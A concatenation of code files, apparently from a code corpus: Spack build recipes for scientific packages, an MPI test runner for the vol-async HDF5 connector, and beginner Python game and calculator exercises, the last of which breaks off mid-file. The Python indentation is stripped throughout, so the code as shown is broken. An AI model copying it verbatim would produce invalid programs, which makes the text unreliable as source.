'-DSKIP_SIMMETRIX_VERSION_CHECK=%s' %
('ON' if '~simmodsuite_version_check' in spec else 'OFF'),
self.define_from_variant('IS_TESTING', 'testing'),
'-DMESHES=%s' % join_path(self.stage.source_path, 'pumi-meshes')
]
if spec.satisfies('@2.2.3'):
args += ['-DCMAKE_CXX_STANDARD=11']
if self.spec.satisfies('simmodsuite=base'):
args.append('-DENABLE_SIMMETRIX=ON')
if self.spec.satisfies('simmodsuite=kernels') or \
self.spec.satisfies('simmodsuite=full'):
args.append('-DENABLE_SIMMETRIX=ON')
args.append('-DSIM_PARASOLID=ON')
args.append('-DSIM_ACIS=ON')
args.append('-DSIM_DISCRETE=ON')
mpi_id = spec['mpi'].name + spec['mpi'].version.string
args.append('-DSIM_MPI=' + mpi_id)
return args
def test(self):
if self.spec.version <= Version('2.2.6'):
return
exe = 'uniform'
options = ['../testdata/pipe.dmg', '../testdata/pipe.smb', 'pipe_unif.smb']
expected = 'mesh pipe_unif.smb written'
description = 'testing pumi uniform mesh refinement'
self.run_test(exe, options, expected, purpose=description,
work_dir=self.prefix.bin)
mpiexec = Executable(join_path(self.spec['mpi'].prefix.bin, 'mpiexec')).command
mpiopt = ['-n', '2']
exe = ['split']
options = ['../testdata/pipe.dmg', '../testdata/pipe.smb', 'pipe_2_.smb', '2']
expected = 'mesh pipe_2_.smb written'
description = 'testing pumi mesh partitioning'
self.run_test(mpiexec, mpiopt + exe + options, expected,
purpose=description, work_dir=self.prefix.bin)
```
#### File: packages/py-cmake/package.py
```python
from spack.package import *
class PyCmake(PythonPackage):
"""CMake is an open-source, cross-platform family of tools designed to
build, test and package software
"""
homepage = "https://cmake.org"
git = "https://github.com/scikit-build/cmake-python-distributions.git"
pypi = "cmake/cmake-3.22.2.tar.gz"
version('3.22.2', sha256='b5bd5eeb488b13cf64ec963800f3d979eaeb90b4382861b86909df503379e219')
version('3.21.4', sha256='30fa5ed8a5ad66dcd263adb87f3ce3dc2d0ec0ac3958f5becff577e4b62cd065')
version('3.18.0', sha256='52b98c5ee70b5fa30a8623e96482227e065292f78794eb085fdf0fecb204b79b')
depends_on('ninja', type='build')
depends_on('[email protected]:', type='build')
depends_on('py-setuptools@42:', type='build')
depends_on('git', type='build')
depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.22.2')
depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.21.4')
depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.18.0')
# see:
# https://github.com/scikit-build/cmake-python-distributions/issues/227
# https://github.com/spack/spack/pull/28760#issuecomment-1029362288
for v in ['3.22.2', '3.21.4', '3.18.0']:
resource(name='cmake-src',
git='https://gitlab.kitware.com/cmake/cmake.git',
commit='v{0}'.format(v), when='@{0}'.format(v),
destination='cmake-src', placement='cmake-src')
def install_options(self, spec, prefix):
return [
'-DBUILD_CMAKE_FROM_SOURCE=ON',
'-DCMakeProject_SOURCE_DIR=cmake-src'
]
```
#### File: packages/py-pyyaml/package.py
```python
from spack.package import *
class PyPyyaml(PythonPackage):
"""PyYAML is a YAML parser and emitter for Python."""
homepage = "https://pyyaml.org/wiki/PyYAML"
pypi = "PyYAML/PyYAML-5.3.1.tar.gz"
git = "https://github.com/yaml/pyyaml.git"
version('6.0', sha256='68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2')
version('5.3.1', sha256='b8eac752c5e14d3eca0e6dd9199cd627518cb5ec06add0de9d32baeee6fe645d')
version('5.2', sha256='c0ee8eca2c582d29c3c2ec6e2c4f703d1b7f1fb10bc72317355a746057e7346c')
version('5.1.2', sha256='01adf0b6c6f61bd11af6e10ca52b7d4057dd0be0343eb9283c878cf3af56aee4')
version('5.1', sha256='436bc774ecf7c103814098159fbb84c2715d25980175292c648f2da143909f95')
version('3.13', sha256='3ef3092145e9b70e3ddd2c7ad59bdd0252a94dfe3949721633e41344de00a6bf')
version('3.12', sha256='592766c6303207a20efc445587778322d7f73b161bd994f227adaa341ba212ab')
version('3.11', sha256='c36c938a872e5ff494938b33b14aaa156cb439ec67548fcab3535bb78b0846e8')
variant('libyaml', default=True, description='Use libYAML bindings')
depends_on('[email protected],3.5:', type=('build', 'link', 'run'))
depends_on('[email protected]:', when='@6:', type=('build', 'link', 'run'))
depends_on('libyaml', when='+libyaml', type='link')
depends_on('py-setuptools', type='build')
depends_on('py-cython', when='@6:+libyaml', type='build')
@property
def import_modules(self):
modules = ['yaml']
if '+libyaml' in self.spec:
modules.append('yaml.cyaml')
return modules
def global_options(self, spec, prefix):
args = []
if '+libyaml' in self.spec:
args.append('--with-libyaml')
else:
args.append('--without-libyaml')
return args
```
#### File: packages/py-tensorflow-probability/package.py
```python
import tempfile
from spack.package import *
class PyTensorflowProbability(Package):
"""TensorFlow Probability (TFP) is a Python library built on
TensorFlow that makes it easy to combine probabilistic models and
deep learning on modern hardware (TPU, GPU). It's for data
scientists, statisticians, ML researchers, and practitioners who
want to encode domain knowledge to understand data and make
predictions."""
homepage = "https://www.tensorflow.org/probability"
url = "https://github.com/tensorflow/probability/archive/v0.12.1.tar.gz"
maintainers = ['aweits']
version('0.12.1', sha256='1fe89e85fd053bf36e8645a5a1a53b729bc254cf1516bc224fcbd1e4ff50083a')
version('0.8.0', sha256='f6049549f6d6b82962523a6bf61c40c1d0c7ac685f209c0084a6da81dd78181d',
url='https://github.com/tensorflow/probability/archive/0.8.0.tar.gz')
extends('python')
depends_on('py-pip', type='build')
depends_on('py-wheel', type='build')
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-decorator', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]:0.2', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('py-dm-tree', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type='build')
def install(self, spec, prefix):
self.tmp_path = tempfile.mkdtemp(prefix='spack')
env['TEST_TMPDIR'] = self.tmp_path
env['HOME'] = self.tmp_path
args = [
# Don't allow user or system .bazelrc to override build settings
'--nohome_rc',
'--nosystem_rc',
# Bazel does not work properly on NFS, switch to /tmp
'--output_user_root=' + self.tmp_path,
'build',
# Spack logs don't handle colored output well
'--color=no',
'--jobs={0}'.format(make_jobs),
# Enable verbose output for failures
'--verbose_failures',
# Show (formatted) subcommands being executed
'--subcommands=pretty_print',
'--spawn_strategy=local',
# Ask bazel to explain what it's up to
# Needs a filename as argument
'--explain=explainlogfile.txt',
# Increase verbosity of explanation,
'--verbose_explanations',
# bazel uses system PYTHONPATH instead of spack paths
'--action_env', 'PYTHONPATH={0}'.format(env['PYTHONPATH']),
'--copt=-O3',
'--copt=-march=native',
':pip_pkg',
]
bazel(*args)
with working_dir(join_path('bazel-bin',
'pip_pkg.runfiles',
'tensorflow_probability')):
args = std_pip_args + ['--prefix=' + prefix, '.']
pip(*args)
remove_linked_tree(self.tmp_path)
```
#### File: packages/py-x21/package.py
```python
import sys
from spack.package import *
class PyX21(PythonPackage):
"""Used for unpacking this author's obfuscated libraries"""
homepage = "https://pypi.org/project/x21/"
list_url = "https://pypi.org/simple/x21/"
def url_for_version(self, version):
url = "https://pypi.io/packages/cp{1}/x/x21/x21-{0}-cp{1}-cp{1}{2}-{3}.whl"
if sys.platform == 'darwin':
platform_string = "macosx_10_9_x86_64"
elif sys.platform.startswith('linux'):
platform_string = "manylinux_2_17_x86_64.manylinux2014_x86_64"
py_ver = Version(version.string.split('y')[1])
return url.format(version.string.split('-')[0],
py_ver.joined,
'm' if py_ver == Version('3.7') else '',
platform_string)
if sys.platform == 'darwin':
version('0.2.6-py3.7',
sha256='7367b7c93fba520e70cc29731baec5b95e7be32d7615dad4f1f034cd21c194bd',
expand=False)
version('0.2.6-py3.8',
sha256='bbbfdb6b56562ecc81f0dc39e009713157011fbb50d47353eb25f633acf77204',
expand=False)
version('0.2.6-py3.9',
sha256='d7b4f06a71ac27d05ae774752b3ca396134916427f371b5995b07f0f43205043',
expand=False)
version('0.2.6-py3.10',
sha256='2cbda690757f1fc80edfe48fcb13f168068f1784f0cb8c300a0d8051714d0452',
expand=False)
elif sys.platform.startswith('linux'):
version('0.2.6-py3.7',
sha256='8b35248d0b049dd09985d1a45c6fa36dd39db2c9d805a96028ec3bf9dc80e0dd',
expand=False)
version('0.2.6-py3.8',
sha256='64275052bcda784395bc613f750b8b5a6b1ddbfa4e7a590cb8e209543f0ca0c4',
expand=False)
version('0.2.6-py3.9',
sha256='e20b29650fcbf0be116ac93511033bf10debc76261b7350e018ff91b92ff950d',
expand=False)
version('0.2.6-py3.10',
sha256='7c5c58ff6dc81caac6815578f78cf545e719beb0bf4017f77120d38025d2bc7d',
expand=False)
depends_on('[email protected]:3.7', type=('build', 'run'), when='@0.2.6-py3.7')
depends_on('[email protected]:3.8', type=('build', 'run'), when='@0.2.6-py3.8')
depends_on('[email protected]:3.9', type=('build', 'run'), when='@0.2.6-py3.9')
depends_on('[email protected]:3.10', type=('build', 'run'), when='@0.2.6-py3.10')
depends_on('py-pynacl', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('py-tomli', type=('build', 'run'))
depends_on('py-tomli-w', type=('build', 'run'))
```
#### File: packages/rename/package.py
```python
from spack.package import *
class Rename(Package):
"""Perl-powered file rename script with many helpful built-ins."""
homepage = "http://plasmasturm.org/code/rename"
url = "https://github.com/ap/rename/archive/v1.600.tar.gz"
version('1.600', sha256='538fa908c9c2c4e7a08899edb6ddb47f7cbeb9b1a1d04e003d3c19b56fcc7f88')
depends_on('perl', type=('build', 'run'))
def install(self, spec, prefix):
Executable('pod2man')('rename', 'rename.1')
bdir = join_path(prefix, 'bin')
mkdirp(bdir)
install('rename', bdir)
mdir = join_path(prefix, 'share', 'man', 'man1')
mkdirp(mdir)
install('rename.1', mdir)
```
#### File: packages/sparrow/package.py
```python
import os
from spack.package import *
class Sparrow(CMakePackage):
"""Sparrow: fast semiempirical quantum chemical calculations.
When publishing results obtained with Sparrow, please cite
the corresponding release as archived on Zenodo
(DOI 10.5281/zenodo.3244105; please use the DOI of the respective
release).
In addition, we kindly request you to cite the following article
when using Sparrow:
<NAME>, <NAME>, <NAME>, "Semiempirical molecular orbital
models based on the neglect of diatomic differential overlap
approximation", Int. J. Quantum Chem., 2018, 118, e25799.
"""
homepage = "https://scine.ethz.ch/"
url = "https://github.com/qcscine/sparrow/archive/refs/tags/3.0.0.tar.gz"
maintainers = ["frobnitzem"]
version(
"3.0.0",
sha256="70636871694c9363ae3fb2df5050bddb22667b71d875d5a7e9afd872f6a2b65d",
)
resource(
name="dev",
url="https://github.com/qcscine/development-utils/archive/refs/tags/4.0.0.tar.gz",
sha256="54002c2082b6bb75672ec66bf9cf3935bbdf6b085ed9b4d7174cbdedb7c2275d",
destination="deps",
placement="dev",
)
depends_on("[email protected]:")
depends_on("boost+filesystem+program_options cxxstd=17 @1.65.0:")
depends_on("[email protected]")
depends_on("py-pip", type="build")
depends_on("yaml-cpp")
depends_on("cereal")
depends_on("googletest")
def patch(self):
os.rmdir("dev")
os.rename("deps/dev", "dev")
if self.spec.satisfies("platform=darwin"):
filter_file(
r"SparrowApp PROPERTIES OUTPUT_NAME sparrow",
'SparrowApp PROPERTIES OUTPUT_NAME sparrow SUFFIX ".exe"',
"src/Sparrow/CMakeLists.txt",
)
filter_file(
r"MAKE_CXX_STANDARD 14 PARENT_SCOPE",
"MAKE_CXX_STANDARD 17 PARENT_SCOPE",
"dev/cmake/ComponentSetup.cmake",
)
def cmake_args(self):
args = [
self.define("SCINE_BUILD_PYTHON_BINDINGS", True),
self.define("SCINE_BUILD_TESTS", self.run_tests),
]
return args
# Adapted from ddd in MacPorts: cmake will build the executable
# "sparrow" right next to the copy of the source directory "Sparrow".
# As HFS+ is case-insensitive by default this will loosely FAIL.
# Mitigate this by building/installing 'sparrowexe'
# on Darwin and fixing up post install.
@run_after("install")
def _rename_exe_on_darwin(self):
if self.spec.satisfies("platform=darwin"):
with working_dir(self.prefix.bin):
os.rename("sparrow.exe", "sparrow")
```
#### File: packages/spiral-package-simt/package.py
```python
from spack.package import *
class SpiralPackageSimt(Package):
"""This is the SPIRAL package for SIMT: SIMT, single instruction multiple
threads, is used to generate code for GPUs and multi-threading aplications."""
homepage = "https://spiral.net"
url = "https://github.com/spiral-software/spiral-package-simt/archive/refs/tags/1.0.0.tar.gz"
git = "https://github.com/spiral-software/spiral-package-simt.git"
maintainers = ['spiralgen']
extends('spiral-software')
version('develop', branch='develop')
version('main', branch='main')
version('1.1.0', sha256='4d6a5e586889b9e000968c99f3068ba86a12cc389665c6deadc4734117ef7a95')
version('1.0.0', sha256='888ca01aa8fd5df80d6ae1bd64eb1b1e70240b6a36bc3437eb48f5a4b59c2d07')
# SIMT package is an extension for Spiral (spec: spiral-software). Spiral finds
# extensions in the "namespaces/packages" folder. Install the tree in a similarly
# named folder so that when activated it'll get symlinked to the correct place.
def install(self, spec, prefix):
spiral_pkgs = join_path(prefix, 'namespaces', 'packages', 'simt')
install_tree('.', spiral_pkgs)
```
#### File: packages/xabclib/package.py
```python
from spack.package import *
class Xabclib(MakefilePackage):
"""
Xabclib (eXtended ABCLib) is a numerical library with auto-tuning facility.
"""
homepage = "http://www.abc-lib.org/Xabclib/index.html"
url = "http://www.abc-lib.org/Xabclib/Release/Xabclib-v1.03.tar.gz"
version('1.03', sha256='9d200f40f1db87abc26cfe75a22db3a6d972988a28fc0ce8421a0c88cc574d1a')
def edit(self, spec, prefix):
cc = [spack_cc, '-O3', self.compiler.openmp_flag]
fc = [spack_fc, '-O3', self.compiler.openmp_flag]
if spec.satisfies('%gcc'):
fc.extend(['-ffixed-form', '-cpp'])
elif spec.satisfies('%fj'):
fc.extend(['-Fixed', '-Cpp'])
filter_file(
'^rm libOpenAT.a$',
'rm -f libOpenAT.a',
'make.all'
)
for makefile in find('.', 'makefile', recursive=True):
m = FileFilter(makefile)
m.filter(
'F90 += .*$',
'F90 = {0}'.format(' '.join(fc))
)
m.filter(
'F90O3 += .*$',
'F90O3 = {0}'.format(' '.join(fc))
)
m.filter(
'CC += .*$',
'CC = {0}'.format(' '.join(cc))
)
m.filter(
'LD += .*$',
'LD = {0}'.format(' '.join(fc))
)
if spec.satisfies('%fj') and 'samples_c' in makefile:
m.filter('$(LD)', '$(LD) -mlcmain=main', string=True)
def build(self, spec, prefix):
sh = which('sh')
sh('./make.all')
def install(self, spec, prefix):
mkdir(prefix.lib)
mkdir(prefix.doc)
install('libOpenAT.a', prefix.lib)
install('Readme.pdf', prefix.doc)
@property
def libs(self):
return find_libraries('libOpenAT', self.prefix.lib, shared=False)
```
#### File: packages/xsdk-examples/package.py
```python
from spack.package import *
class XsdkExamples(CMakePackage, CudaPackage):
"""xSDK Examples show usage of libraries in the xSDK package."""
homepage = 'http://xsdk.info'
url = 'https://github.com/xsdk-project/xsdk-examples/archive/v0.1.0.tar.gz'
git = "https://github.com/xsdk-project/xsdk-examples"
maintainers = ['acfisher', 'balay', 'balos1', 'luszczek']
version('develop', branch='master')
version('0.3.0', sha256='e7444a403c0a69eeeb34a4068be4d6f4e5b54cbfd275629019b9236a538a739e')
version('0.2.0', sha256='cf26e3a16a83eba6fb297fb106b0934046f17cf978f96243b44d9d17ad186db6')
version('0.1.0', sha256='d24cab1db7c0872b6474d69e598df9c8e25d254d09c425fb0a6a8d6469b8018f')
depends_on('xsdk+cuda', when='+cuda')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('xsdk+cuda cuda_arch={0}'.format(sm_),
when='+cuda cuda_arch={0}'.format(sm_))
depends_on('xsdk@develop', when='@develop')
depends_on('[email protected]', when='@0.3.0')
depends_on('[email protected] ^mfem+strumpack', when='@0.3.0 ^xsdk+strumpack')
depends_on('[email protected] ^sundials+magma', when='@0.3.0 +cuda')
depends_on('[email protected]', when='@0.2.0')
depends_on('[email protected]', when='@0.1.0')
depends_on('mpi')
depends_on('[email protected]:', type='build', when='@0.3.0:')
def cmake_args(self):
spec = self.spec
args = [
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
'-DENABLE_HYPRE=ON',
'-DHYPRE_DIR=%s' % spec['hypre'].prefix,
'-DENABLE_MFEM=ON',
'-DMETIS_DIR=%s' % spec['metis'].prefix,
'-DMFEM_DIR=%s' % spec['mfem'].prefix,
'-DENABLE_PETSC=ON',
'-DPETSc_DIR=%s' % spec['petsc'].prefix,
'-DENABLE_PLASMA=ON',
'-DPLASMA_DIR=%s' % spec['plasma'].prefix,
'-DENABLE_SUNDIALS=ON',
'-DSUNDIALS_DIR=%s' % spec['sundials'].prefix,
'-DENABLE_SUPERLU=ON',
'-DSUPERLUDIST_DIR=%s' % spec['superlu-dist'].prefix
]
if '+cuda' in spec: # if cuda variant was activated for xsdk
args.extend([
'-DENABLE_CUDA=ON',
'-DCMAKE_CUDA_ARCHITECTURES=%s' % spec.variants['cuda_arch'].value
])
if '+ginkgo' in spec: # if ginkgo variant was activated for xsdk
args.extend([
'-DENABLE_GINKGO=ON',
'-DGinkgo_DIR=%s' % spec['ginkgo'].prefix
])
if '+magma' in spec: # if magma variant was activated for xsdk
args.extend([
'-DENABLE_MAGMA=ON',
'-DMAGMA_DIR=%s' % spec['magma'].prefix
])
if '+strumpack' in spec: # if magma variant was activated for xsdk
args.extend([
'-DENABLE_STRUMPACK=ON',
'-DSTRUMPACK_DIR=%s' % spec['strumpack'].prefix
])
if '+slate' in spec: # if slate variant was activated for xsdk
args.extend([
'-DENABLE_SLATE=ON',
'-DSLATE_DIR=%s' % spec['slate'].prefix,
'-DBLASPP_DIR=%s' % spec['blaspp'].prefix,
'-DLAPACKPP_DIR=%s' % spec['lapackpp'].prefix
])
if 'trilinos' in spec: # if trilinos variant was activated for xsdk
args.extend([
'ENABLE_TRILINOS=ON',
'-DTRILINOS_DIR_PATH=%s' % spec['trilinos'].prefix
])
if 'zlib' in spec: # if zlib variant was activated for MFEM
args.append('-DZLIB_LIBRARY_DIR=%s' % spec['zlib'].prefix.lib)
return args
```
#### File: packages/z-checker/package.py
```python
from spack.package import *
# ----------------------------------------------------------------------------
class ZChecker(AutotoolsPackage):
"""a library to perform the compression assessment for lossy compressors"""
homepage = "https://github.com/CODARcode/Z-checker"
url = "https://github.com/CODARcode/Z-checker/releases/download/0.7.0/Z-checker-0.7.0.tar.gz"
maintainers = ['disheng222']
version('0.7.0', sha256='02caf3af2dc59d116496f877da888dd2c2dffb9375c413b1d74401927963df3f')
version('0.6.0', sha256='b01c2c78157234a734c2f4c10a7ab82c329d3cd1a8389d597e09386fa33a3117')
version('0.5.0', sha256='ad5e68472c511b393ee1ae67d2e3072a22004001cf19a14bd99a2e322a6ce7f9')
variant('mpi', default=False,
description='Enable mpi compilation')
depends_on('mpi', when="+mpi")
def configure_args(self):
args = []
if '+mpi' in self.spec:
args += ['--enable-mpi']
else:
args += ['--disable-mpi']
return args
```
|
{
"source": "jeanbez/vol-async",
"score": 2
}
|
#### File: vol-async/test/pytest.py
```python
import os, sys, argparse, subprocess
#------------------------------------------------
def guess_mpi_cmd(mpi_tasks, cpu_allocation, verbose):
if verbose: print('os.uname=', os.uname())
node_name = os.uname()[1]
if verbose: print('node_name=', node_name)
sys_name = os.uname()[0]
if verbose: print('sys_name=', sys_name)
if mpi_tasks<=0: mpi_tasks = 4
if 'quartz' in node_name:
# the following setting is needed to combine h5py and subprocess.run on LC
os.environ["PSM2_DEVICES"] = ""
if cpu_allocation == "":
mpirun_cmd="srun -ppdebug " + " -n " + str(mpi_tasks) + " -c "
else:
mpirun_cmd="srun -ppdebug " + " -A " + cpu_allocation + " -n " + str(mpi_tasks)
elif 'cab' in node_name:
mpirun_cmd="srun -ppdebug -n " + str(mpi_tasks)
elif 'nid' in node_name: # the cori knl nodes are called nid
mpirun_cmd="srun --cpu_bind=cores -n " + str(mpi_tasks)
elif 'fourier' in node_name:
mpirun_cmd="mpirun -np " + str(mpi_tasks)
elif 'batch' in node_name: # for summit
mpirun_cmd="jsrun -a1 -c7 -r6 -l CPU-CPU -d packed -b packed:7 -n " + str(mpi_tasks)
else:
#default mpi command
mpirun_cmd="mpirun -np " + str(mpi_tasks)
return mpirun_cmd
#------------------------------------------------
def main_test(mpi_tasks=0, cpu_allocation="", run_parallel=False, verbose=False):
assert sys.version_info >= (3,5) # named tuples in Python version >=3.3
success = True;
num_test=0
num_pass=0
num_fail=0
serial_cases = ['async_test_serial.exe', 'async_test_serial2.exe', 'async_test_multifile.exe', 'async_test_serial_event_set.exe', 'async_test_serial_event_set_error_stack.exe']
parallel_cases = ['async_test_parallel.exe', 'async_test_parallel2.exe', 'async_test_parallel3.exe', 'async_test_parallel4.exe', 'async_test_parallel5.exe']
print("Running serial tests")
for qq in range(len(serial_cases)):
num_test = num_test+1
test_case = serial_cases[qq]
run_cmd = './' + test_case
stdout_file = open('async_vol_test.out', 'wt')
stderr_file = open('async_vol_test.err', 'wt')
status = subprocess.run(
run_cmd,
stdout=stdout_file,
stderr=stderr_file,
)
stdout_file.close()
stderr_file.close()
if status.returncode!=0:
print('ERROR: Test', test_case, ': returned non-zero exit status=', status.returncode, 'aborting test')
print('run_cmd=', run_cmd)
return False
if success:
print('Test #', num_test, ":", test_case, 'PASSED')
num_pass += 1
else:
print('Test #', num_test, ":", test_case, 'FAILED')
num_fail += 1
if run_parallel:
# guess the mpi run command from the uname info
mpirun_cmd=guess_mpi_cmd(mpi_tasks, cpu_allocation, verbose)
print("\nRunning parallel tests")
for qq in range(len(parallel_cases)):
num_test = num_test+1
test_case = parallel_cases[qq]
run_cmd = mpirun_cmd + ' ./' + test_case
stdout_file = open('async_vol_test.out', 'wt')
stderr_file = open('async_vol_test.err', 'wt')
status = subprocess.run(
run_cmd,
shell=True,
stdout=stdout_file,
stderr=stderr_file,
)
stdout_file.close()
stderr_file.close()
if status.returncode!=0:
print('ERROR: Test', test_case, ': returned non-zero exit status=', status.returncode, 'aborting test')
print('run_cmd=', run_cmd)
return False
if success:
print('Test #', num_test, ":", test_case, 'PASSED')
num_pass += 1
else:
print('Test #', num_test, ":", test_case, 'FAILED')
num_fail += 1
# end for all cases in the test_dir
print('Out of', num_test, 'tests,', num_fail, 'failed and ', num_pass, 'passed')
# normal termination
return True
#------------------------------------------------
if __name__ == "__main__":
assert sys.version_info >= (3,5) # named tuples in Python version >=3.5
# default arguments
verbose=False
run_parallel=False
mpi_tasks=0
cpu_allocation=""
parser=argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
parser.add_argument("-m", "--mpitasks", type=int, help="number of mpi tasks")
parser.add_argument("-p", "--parallel", help="run parallel tests", action="store_true")
parser.add_argument("-A", "--cpu_allocation", help="name of cpu bank/allocation",default="")
args = parser.parse_args()
if args.verbose:
#print("verbose mode enabled")
verbose=True
if args.mpitasks:
#print("MPI-tasks specified=", args.mpitasks)
if args.mpitasks > 0: mpi_tasks=args.mpitasks
if args.parallel:
#print("parallel test enabled")
run_parallel=True
if args.cpu_allocation:
#print("cpu_allocation specified=", args.cpu_allocation)
cpu_allocation=args.cpu_allocation
if not main_test(mpi_tasks, cpu_allocation, run_parallel, verbose):
print("pytest was unsuccessful")
```
|
{
"source": "Jean-Bi/100DaysOfCodePython",
"score": 4
}
|
#### File: Day 10/calculator-start/main.py
```python
from art import logo
#Importing the clear function from the replit module
from replit import clear
#Defining the add() function which adds two numbers
def add(n1, n2):
return n1 + n2
#Defining the subtract() function which subtract two numbers
def subtract(n1, n2):
return n1 - n2
#Defining the multiply() function which multiply two numbers
def multiply(n1, n2):
return n1 * n2
#Defining the divide() function which divide two numbers
def divide(n1, n2):
return n1 / n2
#Defining the Dictionary operations which stores operators and associated functions
operations = {
"+": add,
"-": subtract,
"*": multiply,
"/": divide
}
#Defines the calculator() function which allow the user to compute operations
def calculator():
#Clearing the output console
clear()
#Printing the logo
print(logo)
#Storing the user input for the first number
num1 = float(input("What's the first number?: "))
#Printing available operations
for operation in operations:
print(operation)
#Creating the variable used to know if the user wants to continue calculating with the previous result or not
stop = False
#Looping as long as the user doesn't stop
while not stop:
#Storing the user input for the operator
operation_symbol = input("Pick an operation: ")
#Storing the user input for the second number
num2 = float(input("What's the next number?: "))
#Computing both numbers using the function matching the operator
result = operations[operation_symbol](num1, num2)
#Printing the operation and the result
print(f"{num1} {operation_symbol} {num2} = {result}")
#Storing the user's choice to continue or stop
again = input(f"Type 'y' to continue calculating with {result}, or type 'n' to exit.: ")
#Testing whether the user wants to continue or stop
if again == 'n':
#The user wants to stop
stop = True
#Starts a new calculator instance
calculator()
else:
#Storing the result of the preivous operation as the first number
num1 = result
#Starting the program
calculator()
```
#### File: Day 17/quiz-game-start/question_model.py
```python
class Question:
# Defines the init function that is called each time a new object is created
def __init__(self, text, correct_answer):
# The attribute text is initialized with the value of the parameter text
self.text = text
# The attribute answer is initialized with the value of the parameter correct_answer
self.answer = correct_answer
```
#### File: Day 20-21/snake_game/scoreboard.py
```python
from turtle import Turtle
class Scoreboard(Turtle):
"""Creates a scoreboard that keeps track of the score and tells the user the game is over."""
def __init__(self):
super().__init__()
# Initializes the score to 0
self.score = 0
# Sets the color of the text to white
self.color("white")
# Hides the default arrow
self.hideturtle()
# Lifts up the pen to not leave a trail
self.penup()
# Sets the position of the scoreboard to the top of the screen
self.goto(0, 250)
# Writes the scoreboard
self.write(f"Score: {self.score}", align="center", font=("Arial", 24, "normal"))
def update_scoreboard(self):
"""Clears the scoreboard and rewrites it."""
# Clears the scoreboard
self.clear()
# Writes the scoreboard
self.write(f"Score: {self.score}", align="center", font=("Arial", 24, "normal"))
def game_over(self):
"""Displays the game over message."""
# Sets the position of the message to the center of the screen
self.goto(0, 0)
# Writes the game over message
self.write("GAME OVER", align="center", font=("Arial", 24, "normal"))
def increment_score(self):
"""Increments the user's score by 1."""
# Increments the score by 1
self.score += 1
# Updates the scoreboard
self.update_scoreboard()
```
#### File: Day 22/pong/paddle.py
```python
from turtle import Turtle
class Paddle(Turtle):
"""
Class used to represent a paddle
Methods
-------
go_up()
makes the paddle go up
go_down()
makes the paddle go down
"""
def __init__(self, starting_position):
"""
Parameters
----------
starting_position : tuple
the position at which the paddle starts
"""
super().__init__()
# Sets the color of the paddle to white
self.color("white")
# Shapes the paddle as a square
self.shape("square")
# Stretches the width of the paddle 5 times to make it a vertical bar
self.shapesize(stretch_wid=5, stretch_len=1)
# Lifts up the pen to not leave a trail when the paddle moves
self.penup()
# Sets the paddle to its starting position
self.goto(starting_position)
def go_up(self):
"""Makes the paddle go up"""
# Adds 20 to the paddle's y coordinate
new_y = self.ycor() + 20
# Sets the paddle to its new position
self.goto(self.xcor(), new_y)
def go_down(self):
"""Makes the paddle go down"""
# Subtracts 20 to the paddle's y coordinate
new_y = self.ycor() - 20
# Sets the paddle to its new position
self.goto(self.xcor(), new_y)
```
#### File: Day 22/pong/scoreboard.py
```python
from turtle import Turtle
class Scoreboard(Turtle):
"""
Class used to represent a scoreboard
Attributes
----------
l_score : int
the score of the left player
r_score : int
the score of the right player
Methods
-------
update_scoreboard()
clears and updates the scoreboard
l_point()
increases the score of the left player by 1
r_point()
increases the score of the right player by 1
"""
def __init__(self):
super().__init__()
# Sets the color of the scoreboard to white
self.color("white")
# Lifts up the pen to not leave a trail when the scoreboard moves
self.penup()
# Hides the arrow
self.hideturtle()
# Initializes the left player's score
self.l_score = 0
# Initializes the right player's score
self.r_score = 0
# Displays the scoreboard
self.update_scoreboard()
def update_scoreboard(self):
"""Updates the scoreboard"""
# Clears the scoreboard
self.clear()
# Sends the scoreboard to its left part
self.goto(-100, 200)
# Writes left player's score
self.write(self.l_score, align="center", font=("Courier", 80, "normal"))
# Sends the scoreboard to its right part
self.goto(100, 200)
# Writes the right player's score
self.write(self.r_score, align="center", font=("Courier", 80, "normal"))
def l_point(self):
"""Increases the score of the left player by 1"""
# Adds 1 to the left player's score
self.l_score += 1
# Updates the scoreboard
self.update_scoreboard()
def r_point(self):
"""Increases the score of the right player by 1"""
# Adds 1 to the right player's score
self.r_score += 1
# Updates the scoreboard
self.update_scoreboard()
```
#### File: Day 23/turtle-crossing-start/car_manager.py
```python
from turtle import Turtle
import random
# The cars colors
COLORS = ["red", "orange", "yellow", "green", "blue", "purple"]
# The starting speed
STARTING_MOVE_DISTANCE = 5
# The speed increment when the player pass a level
MOVE_INCREMENT = 10
class CarManager(Turtle):
"""
Class to represent a car manager
Attributes
----------
cars
the List of all the cars
speed
the forward movement made by the cars
Methods
-------
add_car()
adds a new car to the car manager
move()
makes all the cars move forward
increase_speed()
increases the speed of all the cars
"""
def __init__(self):
super().__init__()
# Hides the arrow
self.hideturtle()
# Initializes the list of cars
self.cars = []
# Initializes the speed
self.speed = STARTING_MOVE_DISTANCE
def add_car(self):
"""Adds a new car to the car manager"""
# Generates a new car with a probability of 1/7
if random.randint(0, 6) == 1:
# Creates the new car as a square
new_car = Turtle("square")
# Sets a random color ot the car
new_car.color(random.choice(COLORS))
# Lifts the pen to not leave a trail
new_car.penup()
# Stretches the car length by 2
new_car.shapesize(stretch_wid=1, stretch_len=2)
# Generates a random starting x coordinate
random_x = random.randint(320, 360)
# Generates a random starting y coordinate
random_y = random.randint(-250, 250)
# Sets the car to its random starting position
new_car.goto(random_x, random_y)
# Sets heading car to the left
new_car.setheading(180)
# Adds the new car to the list of cars
